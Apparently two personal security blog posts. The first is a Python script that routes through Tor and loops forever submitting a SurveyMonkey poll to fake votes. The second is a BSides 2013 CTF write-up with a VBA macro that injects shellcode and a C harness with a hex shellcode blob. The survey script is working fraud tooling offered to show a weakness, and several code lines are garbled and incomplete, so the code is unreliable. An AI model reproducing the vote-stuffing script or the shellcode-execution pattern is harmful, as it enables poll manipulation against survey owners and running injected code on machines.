Survey Monkey has no captcha, beware

As Survey Monkey is used for surveys you want to have real results.

This post will show how easily it would be to vote fraudulently and manipulate poll results.

For this example I will be using python with it’s mechanize module and Tor installed on Linux. You will also need Firefox with the TamperData plugin.

Firstly I have created a test Survey.


Next I will find out the post data using TamperData.


The important data has been highlighed. The input name on the left is the name of the form element for the What is my name and the number corresponding to it on the far right is the answer I picked “billy”. The rest of the post data is hidden feilds and tokens to identify the response.

With this information it’s easy  to put together a script to automate the submission of the survey. Below is the commented code for the example submission.

#!/usr/bin/env python
#SurveyMonkey needs captcha
import mechanize
import socks
import socket
#patch to use tor, code from stackcoverflow not mine
def create_connection(address, timeout=None, source_address=None):
    sock = socks.socksocket()
    return sock

socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "", 9050)
socket.socket = socks.socksocket
socket.create_connection = create_connection
count = 0
while True:
    br = mechanize.Browser()# Open the broswer object
    br.addheaders = [('User-agent', ' Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31')]'') # survey to test
    #What is my name?
    #Drop down you say selection c
    #Tell me about yourself
    text = "testing 123" # text for the form
    br.submit()#submit the form
    br.response().read()#print the response
    print br.response().read()
    print "Number of votes: "+ str(count) # print number of votes

The script worked as expected and billy was the most popular name.


Solving Bsides 2013 Challenge 1

The challenge was to get a password from the excel document.

If you looked inside the Macro for the excel document you could see it was running shellcode.

So i edited the macro to write the shellcode to a file before it was run.

Private Sub ExecuteShellCode()
Dim lpMemory As Long
Dim sShellCode As String
Dim lResult As Long

sShellCode = ShellCode()
Open "C:\shellcode" For Output As #1
Write #1, ShellCode()
Close #1
lpMemory = VirtualAlloc(0&, Len(sShellCode), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
lResult = WriteProcessMemory(-1&, lpMemory, sShellCode, Len(sShellCode), 0&)
lResult = CreateThread(0&, 0&, lpMemory, 0&, 0&, 0&)
End Sub

After opening the file it has some shellcode that decodes and runs the exe thats base 64 encoded.


So I just run the Shellcode using C. As the shellocode was super long windows didn’t like it so I used GCC.

#include <stdio.h>

char shellcode[] = "\xeb\x3a\x31\xd2\x80\x3b\x2b\x75\x04\xb2\x3e\xeb\x26\x80\x3b\x2f\x75\x04\xb2\x3f\xeb\x1d\x80\x3b\x39\x77\x07\x8a\x13\x80\xea\xfc\xeb\x11\x80\x3b\x5a\x77\x07\x8a\x13\x80\xea\x41\xeb\x05\x8a\x13\x80\xea\x47\xc1\xe0\x06\x08\xd0\x43\xc3\xeb\x05\xe8\xf9\xff\xff\xff\x5b\x31\xc9\x80\xc1\x36\x01\xcb\x89\xd9\x31\xc0\x80\x3b\x3d\x74\x25\xe8\xab\xff\xff\xff\xe8\xa6\xff\xff\xff\xe8\xa1\xff\xff\xff\xe8\x9c\xff\xff\xff\x86\xc4\xc1\xc0\x10\x86\xc4\xc1\xc8\x08\x89\x01\x83\xc1\x03\xeb\xd4"

"6FoIAADDVYnlUVZXi00Mi3UQi30U/ +9999 lines of base64 encoded lines.


int main(int argc, char **argv)
int (*func)();
func = (int (*)()) shellcode;

I then loaded it into olly and stepped through the program and kept an eye on what chars were in the registers. Until I saw “ExcelMagic” in a ECX which was being compared to my input.